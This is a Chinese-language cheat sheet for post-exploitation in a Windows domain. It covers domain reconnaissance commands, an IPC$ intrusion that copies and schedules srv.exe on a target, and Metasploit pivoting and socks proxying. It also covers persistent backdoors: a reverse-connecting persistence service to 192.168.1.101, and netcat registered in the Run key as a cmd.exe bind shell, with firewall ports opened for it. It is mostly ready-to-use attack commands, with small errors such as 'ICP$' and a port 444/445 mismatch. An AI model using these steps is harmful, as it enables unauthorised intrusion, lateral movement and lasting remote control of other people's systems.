信息收集
有了内网的第一台机器的权限后,就到了很关键的一步信息收集,它也是内网渗透中不可或缺的一部分。
查看当前机器的网络环境,收集域里的相关信息,包括所有的用户、所有的计算机,以及相关关键组的信息。
net user/domain:查看域用户
net view/domain:查看有几个域
net view/domain:xxx:查看域内的主机
net group/domain:查看域里面的组
net group "domain computers" /domain:查看域内所有的主机名
net group "domain admins" /domain:查看域管理员
net group "domain controllers" /domain:查看域控制器
net group "enterprise admins" /domain:查看企业管理组
nettime/domain:查看时间服务器
通过以上可以获得很多信息,此时有两种情况:
当前服务器可以直接攻击域服务器和不可以直接攻击域服务器
不可以直接攻击又分为两种情况:
如果是权限不够就需要提升权限,如果是不能连接到域服务器,则需要攻击内网中某个可以连接到域服务器的服务器,然后以此做为跳板
现在权限问题不可以直接攻击域服务器,可以采取以下方法继续渗透:
- 使用meterpreter目前拥有的权限添加内网路由,进行弱口令扫描
- 使用powershell对内网进行扫描(要求目标机是windows7以上的服务器)
- 架设socks4a然后socks会自动进行内网扫描
- 利用当前权限进行内网IPC$渗透
- 其他方法
ICP$入侵
即通过使用windows系统中默认启动的IPC$共享获得计算机控制权的入侵,在内网中极其常见。
D:>net use\127.0.0.1\IPC$ 连接127.0.0.1的IPC$共享
D:>copy srv.exe\127.0.0.1\IPC$ 复制srv.exe到目标机
D:>net time\127.0.0.1 查时间
D:>at \127.0.0.1 10:50 srv.exe 用at命令在10点50分启动srv.exe
pivoting跳板攻击
- 利用已经被入侵的边缘机器作为跳板来攻击网络中的其他机器
- 访问由于路由问题而不能直接访问的内网机器
自动路由
run autoroute -s 192. 168.102. 0/24
run post/multi/manage/autoroute
扫描内网网络:
run post/Windows/gather/arp_scanner rhosts = 192.168.102.0/24
use auxiliary/scanner/portscan/tcp
proxychains代理设置
socket代理
auxiliary/server/socks4a
proxy chains nmap 扫描
永久后门
metsvc:
通过服务启动
run metsvc -A #设定端口、上传后门文件
persistence:
通过启动型启动
特性:定期回连、系统启动时回连、自动运行
run persistence -A -S -U -i 60 -p 4321 -r 192.168.1.101
nc后门
上传nc:Upload/root/nc.exe C:\\windows\\system32
修改注册表
枚举注册表键值:reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
在当前主键下增加一个nc键值:reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -LDP 444 -e cmd.exe'
查看nc键值:reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
设置防火墙
开启一个cmd的通道
execute -f cmd -i -H
查看防火墙状态
netsh firewall show opmode
添加防火墙规则允许444端口通过
netsh firewall add portopening TCP 445 "Service Firewall" ENABLE
查看端口状态
netsh firewall show portopening
开始连接
nc -v ip port